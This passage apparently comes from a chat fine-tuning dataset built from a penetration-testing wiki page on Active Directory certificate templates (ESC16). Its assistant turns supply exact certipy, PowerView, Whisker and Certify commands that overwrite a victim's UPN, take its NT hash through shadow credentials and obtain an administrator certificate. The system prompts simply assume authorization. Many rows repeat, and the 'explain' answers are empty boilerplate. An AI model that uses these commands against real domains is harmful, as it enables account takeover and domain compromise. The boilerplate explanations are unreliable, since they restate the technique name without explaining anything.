\"$DC_IP\" -account 'victim' \\\n auto\n`\n\nStep 3: Request the certificate as the victim user from a suitable authentication template (e.g., \"User\") \n`bash\ncertipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"\n`\n\nStep 4: Revert the victim account's UPN\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update\n`\n\nStep 5: Authenticate as the target account\n`bash\ncertipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the targ", "metadata": {"corpus_index": 134, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "In this scenario, the attacker has GenericWrite permission over a victim account, which can be used to overwrite the victim's UPN. Using the victim's NT hash obtained via a Shadow Credentials attack, it's possible to request a certificate from the CA on the victim's behalf. Thanks to the UPN manipulation, a valid certificate can be obtained for any user in the domain.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1. This will cause the KDC to check only the UPN of the SAN included in the certificate request\n> * The attacker user needs to have a GenericWrite or equivalent permission over the victim user\n\n::: tabs\n\n=== UNIX-like\n\nStep 1: Read the UPN of the victim\n``bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read\n`\n\nStep 2: Update the victim account's UPN to the target administrator's samAccountName\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update\n`\n\n(If needed) Retrieve the credentials for the victim (NT Hash)\n`bash\ncertipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto\n`\n\nStep 3: Request the certificate as the victim user from a suitable authentication template (e.g., \"User\") \n`bash\ncertipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"\n`\n\nStep 4: Revert the victim account's UPN\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update\n`\n\nStep 5: Authenticate as the target account\n`bash\ncertipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the targ"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?", "response": "In this scenario, the attacker has GenericWrite permission over a victim account, which can be used to overwrite the victim's UPN. Using the victim's NT hash obtained via a Shadow Credentials attack, it's possible to request a certificate from the CA on the victim's behalf. Thanks to the UPN manipulation, a valid certificate can be obtained for any user in the domain.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1. This will cause the KDC to check only the UPN of the SAN included in the certificate request\n> * The attacker user needs to have a GenericWrite or equivalent permission over the victim user\n\n::: tabs\n\n=== UNIX-like\n\nStep 1: Read the UPN of the victim\n``bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read\n`\n\nStep 2: Update the victim account's UPN to the target administrator's samAccountName\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update\n`\n\n(If needed) Retrieve the credentials for the victim (NT Hash)\n`bash\ncertipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto\n`\n\nStep 3: Request the certificate as the victim user from a suitable authentication template (e.g., \"User\") \n`bash\ncertipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"\n`\n\nStep 4: Revert the victim account's UPN\n`bash\ncertipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update\n`\n\nStep 5: Authenticate as the target account\n`bash\ncertipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the targ", "metadata": {"corpus_index": 134, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - (esc16 a) compatibility mode?", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read", "metadata": {"corpus_index": 135, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -user 'victim' \\\n read", "metadata": {"corpus_index": 135, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 135, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update", "metadata": {"corpus_index": 136, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC16 A) Compatibility mode during a pentest?"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC16 A) Compatibility mode during a pentest?", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'administrator' \\\n -user 'victim' update", "metadata": {"corpus_index": 136, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 136, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - (esc16 a) compatibility mode"}, {"role": "assistant", "content": "certipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - (esc16 a) compatibility mode", "response": "certipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto", "metadata": {"corpus_index": 137, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "certipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC16 A) Compatibility mode?", "response": "certipy shadow \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -account 'victim' \\\n auto", "metadata": {"corpus_index": 137, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy shadow \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy shadow \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 137, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "certipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?", "response": "certipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"", "metadata": {"corpus_index": 138, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "certipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC16 A) Compatibility mode?", "response": "certipy req \\\n -u \"victim@$DOMAIN\" -hashes \"$NT_HASH\" \\\n -ca DOMAIN-DC-CA -template User \\\n -upn \"administrator@$DOMAIN\" -dc-ip \"$DC_IP\"", "metadata": {"corpus_index": 138, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 138, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate templates - (esc16 a) compatibility mode?", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update", "metadata": {"corpus_index": 139, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC16 A) Compatibility mode"}, {"role": "assistant", "content": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC16 A) Compatibility mode", "response": "certipy account \\\n -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" \\\n -dc-ip \"$DC_IP\" -upn 'victim@$DOMAIN' \\\n -user 'victim' update", "metadata": {"corpus_index": 139, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 139, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - (esc16 a) compatibility mode"}, {"role": "assistant", "content": "certipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - (esc16 a) compatibility mode", "response": "certipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"", "metadata": {"corpus_index": 140, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - (ESC16 A) Compatibility mode"}, {"role": "assistant", "content": "certipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - (ESC16 A) Compatibility mode", "response": "certipy auth \\\n -dc-ip \"$DC_IP\" -pfx 'administrator.pfx' \\\n -username 'administrator' -domain \"$DOMAIN\"", "metadata": {"corpus_index": 140, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy auth \\`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy auth \\`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 140, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Set-DomainObject for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Set-DomainObject for certificate templates - (esc16 a) compatibility mode?", "response": "Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose", "metadata": {"corpus_index": 141, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Set-DomainObject"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC16 A) Compatibility mode?", "response": "Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose", "metadata": {"corpus_index": 141, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Set-DomainObject victim -Set @{'userPrincipalName'='administrator'} -Verbose`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 141, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Whisker.exe for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Whisker.exe for certificate templates - (esc16 a) compatibility mode?", "response": "Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"", "metadata": {"corpus_index": 142, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Whisker.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC16 A) Compatibility mode"}, {"role": "assistant", "content": "Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC16 A) Compatibility mode", "response": "Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"", "metadata": {"corpus_index": 142, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Whisker.exe add /target:\"victim\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 142, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Certify.exe command to certificate templates - (esc16 a) compatibility mode"}, {"role": "assistant", "content": "Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Certify.exe command to certificate templates - (esc16 a) compatibility mode", "response": "Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"", "metadata": {"corpus_index": 143, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized 